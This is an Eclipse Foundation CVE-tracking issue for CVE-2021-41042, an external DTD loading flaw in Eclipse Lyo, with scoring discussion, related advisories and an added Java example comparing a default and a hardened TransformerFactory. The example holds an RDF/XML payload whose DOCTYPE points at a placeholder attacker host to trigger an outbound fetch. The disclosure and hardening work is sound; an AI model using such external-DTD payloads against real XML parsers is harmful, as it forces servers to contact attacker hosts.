CVE-2021-41042: External DTD access in Eclipse Lyo (#287) · Issues · Eclipse Foundation / EMO Team / EMO
Created May 05, 2022 by Andrii Berezovskyi (@aberezovsky), 6 of 6 tasks completed

External DTD access in Eclipse Lyo

The Eclipse Foundation is a Common Vulnerabilities and Exposures (CVE) Numbering Authority. This issue is used to request and track the progress of the assignment of a CVE for a vulnerability in the project code for an Eclipse open source project.

Basic information

Project name: Eclipse Lyo

Project id: technology.lyo

Versions affected: [1.0.0, 4.1.0]

Common Weakness Enumeration:

  • CWE-611

Common Vulnerability Scoring System: {cvss}

I don’t know the right score, as I don’t have a proven exploit for it. I simply fixed the SonarCloud warning and I assume the score is similar to a very similar issue in Apache Jena. However, they had two CVEs, one for just external DTD loading, which has a 4.5 score (CVE-2022-28890) and another one for potential XXE code execution which has a score of 7.5 (CVE-2021-39239). My assessment is https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?vector=(AV:N/AC:M/Au:S/C:N/I:P/A:P/E:U/RL:OF/RC:C/CDP:L/TD:ND/CR:ND/IR:ND/AR:ND or https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L&version=3.1 for v3) assuming the REST API getting attacked is protected and the attacker needs valid credentials to access the API. The rating could be worse if users expose an API that does not require auth (our SDK does not enforce it): https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?vector=(AV:N/AC:M/Au:S/C:N/I:P/A:P/E:U/RL:OF/RC:C/CDP:L/TD:ND/CR:ND/IR:ND/AR:ND)

Summary:

In Eclipse Lyo versions 1.0.0 to 4.1.0, a TransformerFactory is initialized with the defaults that do not restrict DTD loading when working with RDF/XML. This allows an attacker to cause an external DTD to be retrieved.

Links:

  • https://docs.oracle.com/en/java/javase/17/security/java-api-xml-processing-jaxp-security-guide.html#GUID-8CD65EF5-D113-4D5C-A564-B875C8625FAC (I am not sure what you mean though.)
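The following is an added example, not code from Eclipse Lyo and not the project's actual fix, that shows the weak TransformerFactory setup the summary describes beside a hardened one, using the JAXP properties documented in the Oracle guide linked above. It assumes the JDK's built-in JAXP implementation; the class name, the `attacker.invalid` host and the RDF/XML input are constructed placeholders.

```java
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;
import java.io.StringReader;
import java.io.StringWriter;

public class DtdHardeningDemo {

    // Constructed RDF/XML input carrying a DOCTYPE that points at an external DTD.
    // The host uses the reserved .invalid TLD so the demo never reaches a real server.
    static final String RDF_WITH_EXTERNAL_DTD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE rdf:RDF SYSTEM \"http://attacker.invalid/evil.dtd\">\n"
      + "<rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\">\n"
      + "  <rdf:Description rdf:about=\"urn:example:resource\"/>\n"
      + "</rdf:RDF>\n";

    // Before: JDK defaults. accessExternalDTD defaults to "all", so the parser behind the
    // identity transform opens a connection to whatever the DOCTYPE names.
    static TransformerFactory defaultFactory() {
        return TransformerFactory.newInstance();
    }

    // After: deny every external DTD and stylesheet fetch. An empty string for the
    // access properties means "no protocol is allowed"; secure processing is enabled
    // as well so the JDK's resource limits apply. Same properties work on
    // DocumentBuilderFactory and SAXParserFactory.
    static TransformerFactory hardenedFactory() throws TransformerConfigurationException {
        TransformerFactory tf = TransformerFactory.newInstance();
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return tf;
    }

    // Identity transform of the input. Returns the serialized document, or the error
    // message when the transform fails, so the two factories can be compared side by side.
    static String transform(TransformerFactory tf, String xml) {
        try {
            Transformer t = tf.newTransformer();
            StringWriter out = new StringWriter();
            t.transform(new StreamSource(new StringReader(xml)), new StreamResult(out));
            return out.toString();
        } catch (Exception e) {
            return "ERROR: " + e.getMessage();
        }
    }

    public static void main(String[] args) throws Exception {
        // Hardened: fails fast with a message naming the accessExternalDTD restriction;
        // no network access is attempted.
        System.out.println("hardened: " + transform(hardenedFactory(), RDF_WITH_EXTERNAL_DTD));
        // Default: the JDK tries to fetch evil.dtd. Here that surfaces as a DNS failure for
        // attacker.invalid, which is exactly the outbound request an attacker wants.
        System.out.println("default:  " + transform(defaultFactory(), RDF_WITH_EXTERNAL_DTD));
    }
}
```

The observable difference is in the error text: the hardened factory rejects the document before any I/O, while the default factory only fails because the placeholder host does not resolve; pointed at a reachable host it would complete the fetch silently. When checking a codebase for this pattern, look for every `TransformerFactory.newInstance()` that is not followed by these `setAttribute` calls.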

Tracking

This section will be completed by the project team.

  • We’re ready for this issue to be reported to the central authority (i.e., make this public now)
  • (when applicable) The GitHub Security Advisory is ready to be published now

Note that for those projects that host their repositories on GitHub, the use of GitHub Security Advisories is recommended but is not required.

This section will be completed by the EMO.

CVE: CVE-2021-41042

  • All required information is provided
  • CVE Assigned
  • Pushed to Mitre
  • Accepted by Mitre

Edited Jul 07, 2022 by Wayne Beaton


Related news

GHSA-6296-mvgp-27hp: XML External Entity Reference in Eclipse Lyo

In Eclipse Lyo versions 1.0.0 to 4.1.0, a TransformerFactory is initialized with the defaults that do not restrict DTD loading when working with RDF/XML. This allows an attacker to cause an external DTD to be retrieved.

CVE-2021-29768: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities

IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a low level user to obtain sensitive information from the details of the 'Cloud Storage' page for which they should not have access. IBM X-Force ID: 202682.

GHSA-gchv-364h-r896: XML External Entity Reference in apache jena

A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.

CVE-2022-28890

A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.
